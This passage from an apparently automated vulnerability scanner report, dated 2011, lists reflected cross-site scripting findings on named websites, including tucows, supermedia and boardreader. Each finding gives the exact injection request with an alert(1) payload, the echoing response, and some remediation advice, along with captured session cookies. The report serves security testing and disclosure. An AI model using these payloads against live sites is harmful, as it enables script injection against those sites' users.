Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:57:07 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes/03BlueMeany/style.cssa9f64"-alert(1)-"4bb4721a55e";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.35. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86915"-alert(1)-"a2383cc0931 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes86915"-alert(1)-"a2383cc0931/themes/03BlueMeany/styles.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:23 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes86915"-alert(1)-"a2383cc0931/themes/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.36. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 942cd"-alert(1)-"ffd8d4c4a27 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes942cd"-alert(1)-"ffd8d4c4a27/03BlueMeany/styles.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:31 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes942cd"-alert(1)-"ffd8d4c4a27/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.37. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17188"-alert(1)-"4251e1c163 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany17188"-alert(1)-"4251e1c163/styles.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:46 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes/03BlueMeany17188"-alert(1)-"4251e1c163/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.38. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eac0c"-alert(1)-"7fb6f8e43f1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany/styles.csseac0c"-alert(1)-"7fb6f8e43f1 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:55 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes/03BlueMeany/styles.csseac0c"-alert(1)-"7fb6f8e43f1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.39. http://redacted/qsonhs.aspx [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redacted
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 41045<img%20src%3da%20onerror%3dalert(1)>5f7c0dc355 was submitted in the q parameter. This input was echoed as 41045<img src=a onerror=alert(1)>5f7c0dc355 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?form=MSN005&q=41045<img%20src%3da%20onerror%3dalert(1)>5f7c0dc355 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: redacted
Proxy-Connection: Keep-Alive
Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; SRCHD=MS=1621087&D=1593447&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; _UR=OMW=1

Response

HTTP/1.1 200 OK
Content-Length: 78
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 7657c7605f1b4484957eacda45f83fd2
Date: Fri, 04 Feb 2011 17:55:54 GMT
Connection: close

{"AS":{"Query":"41045<img src=a onerror=alert(1)>5f7c0dc355","FullResults":1}}

1.40. http://blog.supermedia.com/comment_html.php [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /comment_html.php

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 791b3</script><script>alert(1)</script>95b6769fb51 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comment_html.php?cid=791b3</script><script>alert(1)</script>95b6769fb51 HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:38 GMT
Server: Unspecified
Content-Length: 101
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:38 GMT;path=/

<script type="text/javascript">alert("791b3</script><script>alert(1)</script>95b6769fb51");</script>

1.41. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2e1f"><script>alert(1)</script>3606575b7cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /index.php?z=1&source=opensearch&a=s&q={searchTerms}&b2e1f"><script>alert(1)</script>3606575b7cc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:52:49 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           
                                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com/rss/%7BsearchTerms%7D.html?source=opensearch&b2e1f"><script>alert(1)</script>3606575b7cc=1&p=20&format=RSS2.0" />
...[SNIP]...

1.42. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d10e'><script>alert(1)</script>2f96e732bb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /index.php?z=1&source=opensearch&a=s&q={searchTerms}&2d10e'><script>alert(1)</script>2f96e732bb6=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:53:00 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           
                                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta
...[SNIP]...
<input type=hidden name='2d10e'><script>alert(1)</script>2f96e732bb6' value="1">
...[SNIP]...

1.43. http://boardreader.com/my/signup.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /my/signup.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da9f2"><script>alert(1)</script>671f469cc02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/signup.html?da9f2"><script>alert(1)</script>671f469cc02=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:38 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<form name="mylogin_" action="/my/signup.html?da9f2"><script>alert(1)</script>671f469cc02=1" method="POST">
...[SNIP]...

1.44. http://boardreader.com/pop/articles/-/-/7.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/articles/-/-/7.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37ec4"><script>alert(1)</script>e3800dfbbbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/articles/-/-/7.html?37ec4"><script>alert(1)</script>e3800dfbbbc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:32:07 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/Toilet%2Bpaper%2Borientation.html?37ec4"><script>alert(1)</script>e3800dfbbbc=1" title="Search discussions for item &quot;Toilet paper orientation&quot;">
...[SNIP]...

1.45. http://boardreader.com/pop/films/-/-/3.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/films/-/-/3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef06b"><script>alert(1)</script>06db0769bba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/films/-/-/3.html?ef06b"><script>alert(1)</script>06db0769bba=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:56 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/D.html?ef06b"><script>alert(1)</script>06db0769bba=1" title="Search discussions for item &quot;D&quot;">
...[SNIP]...

1.46. http://boardreader.com/pop/instructions/-/-/7.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/instructions/-/-/7.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5f8"><script>alert(1)</script>69f17f800bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/instructions/-/-/7.html?9a5f8"><script>alert(1)</script>69f17f800bf=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:57 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/How%2Bto%2BBuild%2Ban%2BEarthbag%2BDome.html?9a5f8"><script>alert(1)</script>69f17f800bf=1" title="Search discussions for item &quot;How to Build an Earthbag Dome&quot;">
...[SNIP]...

1.47. http://boardreader.com/pop/news/-/-/3.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/news/-/-/3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 633c8"><script>alert(1)</script>21ff8f9967b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/news/-/-/3.html?633c8"><script>alert(1)</script>21ff8f9967b=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:32:01 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/Chinese%2Bair%2Bforce%2Bdrill%2Blooks%2Bawfully%2Bsimilar%2Bto%2B%25E2%2580%2598Top%2BGun%25E2%2580%2599.html?633c8"><script>alert(1)</script>21ff8f9967b=1" title="Search discussions for item &quot;Chinese air force drill looks awfully similar to ...Top Gun...&quot;">
...[SNIP]...

1.48. http://boardreader.com/pop/releases/-/-/3.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
